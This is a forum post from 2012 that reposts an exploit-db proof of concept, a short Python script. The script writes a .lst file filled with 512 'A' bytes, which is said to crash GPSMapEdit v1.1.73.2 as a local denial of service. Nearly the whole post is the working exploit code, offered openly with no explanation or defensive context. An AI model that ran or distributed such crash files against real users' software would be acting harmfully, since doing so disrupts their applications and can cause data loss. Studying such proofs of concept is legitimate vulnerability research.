The_Arhitect Posted January 9, 2012 Report Posted January 9, 2012 #!/usr/bin/python# Exploit Title: GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability# Version: 1.1.73.2# Date: 2012-01-08# Author: Julien Ahrens# Homepage: www.inshell.net# Software Link: http://www.geopainting.com# Tested on: Windows XP SP3 Professional German / Windows 7 Professional 64bit Germanfile="GPSMapEdit_crash.lst"junk="\x41"*512print "[*] Creating crash file...\n";writeFile = open (file, "w")writeFile.write(junk)writeFile.close()print "[*] File successfully created!\n\n";source: exploit-db.com Quote